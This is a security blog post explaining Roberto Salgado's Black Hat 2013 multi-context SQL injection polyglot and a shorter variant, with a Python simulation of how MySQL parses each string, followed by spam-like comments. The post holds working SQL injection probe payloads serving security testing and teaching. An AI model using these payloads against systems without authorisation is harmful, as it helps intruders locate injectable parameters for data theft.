SQL Injection Detection Optimization
For Black Hat 2013, Roberto Salgado (@LightOS) came up with the idea of optimizing the detection phase of SQL injection vulnerabilities.
Usually, to test whether a parameter is vulnerable to SQL injection, at least the following requests have to be sent to find out the context of the injection, which might be between single quotes ('), between double quotes (") or without any delimiter at all. Each pair of a TRUE and a FALSE request must produce visibly different responses for one of the contexts:
TRUE RESPONSES
-1' or '1'='1
-1" or "1"="1
-1 or 1=1
FALSE RESPONSES
-1' or '1'='0
-1" or "1"="0
-1 or 1=0
LightOS came up with the idea of fusing the three test vectors into one. The result is a multi-context polyglot that evaluates to true in any of the three contexts mentioned above, so a single request replaces three. Note that it relies on #, MySQL's end-of-line comment, to discard the trailing part in the numeric context:
-1 OR 1#"or"'OR''='"="'OR''='
In each context a different slice of the same string is live SQL (the slides mark this with highlighting):
Numeric context:
-1 OR 1#"or"'OR''='"="'OR''='
(only -1 OR 1 is parsed; everything after # is a comment)
Double quotation:
-1 OR 1#"or"'OR''='"="'OR''='
(the first " closes the string, leaving or "'OR''='" = "'OR''='", a comparison of two identical strings)
Single quotation:
-1 OR 1#"or"'OR''='"="'OR''='
(the first unescaped ' closes the string, leaving OR '' = '"="' OR '' = '', whose last comparison is true)
You can find his slides in the following link: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf
Mirror: https://nzt-48.org/archive/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf
My version of the vector is 7 characters shorter:
-1 or 1#'or"or'"!='!="
Numeric context:
-1 or 1#'or"or'"!='!="
(as before, only -1 or 1 is parsed and # comments out the rest)
Single quotation:
-1 or 1#'or"or'"!='!="
(the ' after # closes the string, leaving or "or'" != '!="', two different strings, so true)
Double quotation:
-1 or 1#'or"or'"!='!="
(the " after 'or closes the string, leaving or '"!=' != "", a non-empty string compared against the empty one, so true)
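To check both polyglots above without a database, here is an added example (not code from the original post or from Salgado's slides): a small Python model of how a MySQL-style parser re-reads one injected string in the numeric, single-quoted and double-quoted contexts. It assumes MySQL rules (# as line comment, doubled quotes as escaped quotes, string-to-number coercion of a leading numeric prefix); the predicate templates, the column names id and name, and the sample row are constructed for the example. Anything the vectors do not need (backslash escapes, other operators, full coercion rules) is left out.

```python
"""MySQL-style re-reading of one injected string in the numeric, single- and
double-quoted contexts. Only what the vectors need is modelled: '...'/"..."
literals with doubled-quote escaping, '#' line comments, integers, =, !=, OR."""
import re

# Constructed predicate templates and sample row (not from the original post).
CONTEXTS = {"numeric": "id = {p}", "single": "name = '{p}'", "double": 'name = "{p}"'}
ROW = {"id": 5, "name": "alice"}
SALGADO = "-1 OR 1#\"or\"'OR''='\"=\"'OR''='"  # 29 chars, from the slides
SHORTER = "-1 or 1#'or\"or'\"!='!=\""          # 22 chars, the post's variant


def lex(sql):
    """Tokenize with MySQL quoting rules; ValueError stands in for a syntax error."""
    tokens, i, n = [], 0, len(sql)
    while i < n:
        c = sql[i]
        if c.isspace():
            i += 1
        elif c == "#":                          # comment: rest of line dropped
            break
        elif c in "'\"":
            j, buf = i + 1, []
            while j < n and not (sql[j] == c and sql[j + 1:j + 2] != c):
                buf.append(sql[j])
                j += 2 if sql[j] == c else 1    # doubled quote = literal quote
            if j >= n:
                raise ValueError("unterminated string literal")
            tokens.append(("str", "".join(buf)))
            i = j + 1
        elif c.isdigit() or (c == "-" and sql[i + 1:i + 2].isdigit()):
            m = re.match(r"-?\d+", sql[i:])
            tokens.append(("num", int(m.group())))
            i += m.end()
        elif sql.startswith("!=", i) or c == "=":
            tokens.append(("op", "!=" if c == "!" else "="))
            i += 2 if c == "!" else 1
        elif c.isalpha() or c == "_":
            m = re.match(r"\w+", sql[i:])
            tokens.append(("word", m.group()))
            i += m.end()
        else:
            raise ValueError(f"unexpected character {c!r} at offset {i}")
    return tokens


def to_num(v):
    """MySQL-style coercion: a string counts as its leading number, else 0."""
    m = None if isinstance(v, int) else re.match(r"\s*(-?\d+)", v)
    return v if isinstance(v, int) else (int(m.group(1)) if m else 0)


def evaluate(tokens, row):
    """expr := cmp (OR cmp)* ; cmp := atom [(= | !=) atom]; words are columns."""
    pos = 0

    def atom():
        nonlocal pos
        kind, val = tokens[pos]                 # IndexError: predicate ends early
        pos += 1
        if kind != "word":
            return val
        if val.upper() == "OR":
            raise ValueError("operand expected before OR")
        return row[val]                         # KeyError: unknown column

    def comparison():
        nonlocal pos
        left = atom()
        if pos == len(tokens) or tokens[pos][0] != "op":
            return to_num(left) != 0            # bare value in boolean context
        op = tokens[pos][1]
        pos += 1
        right = atom()
        if isinstance(left, str) and isinstance(right, str):
            equal = left == right
        else:
            equal = to_num(left) == to_num(right)
        return equal if op == "=" else not equal

    result = comparison()
    while pos < len(tokens):
        kind, val = tokens[pos]
        if kind != "word" or val.upper() != "OR":
            raise ValueError(f"syntax error near {val!r}")
        pos += 1
        rhs = comparison()                      # consumed even if result is already true
        result = result or rhs
    return result


def probe(payload, row=ROW):
    """Map each context to True, False or "error" for one injected value."""
    out = {}
    for name, template in CONTEXTS.items():
        try:
            out[name] = evaluate(lex(template.format(p=payload)), row)
        except (ValueError, KeyError, IndexError):
            out[name] = "error"
    return out


if __name__ == "__main__":
    for label, vec in (("LightOS", SALGADO), ("shorter", SHORTER), ("naive", "-1' or '1'='1")):
        print(f"{label:8} {len(vec):2} chars  {probe(vec)}")
```

Running it shows both polyglots evaluating to true in all three contexts, while the plain single-quote probe -1' or '1'='1 is a syntax error in the numeric context and simply false in the double-quoted one. The same model also makes the main caveat visible: remove the # handling from lex and the numeric context fails, which is what happens on a DBMS such as PostgreSQL or SQL Server, where # is not a comment and -- would be needed instead.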
I find LightOS's solution to be much more elegant because he used an equality. See if you can make it even shorter.
Filed under: Hacking,SQL,Web Application Security - @ 2023-07-12 16:25
Tags: black, blackhat, detection, hat, injection, lightos, optimization, roberto, salgado, sql
It's hard to come by knowledgeable people in this particular subject, but you seem like you know what you're talking about! Thanks
I have been surfing online more than three hours today, but I by no means discovered any interesting article like yours. It's lovely value sufficient for me. Personally, if all web owners and bloggers made just right content material as you probably did, the internet might be much more helpful than ever before.
Your writing captures the essence of the topic in a captivating way.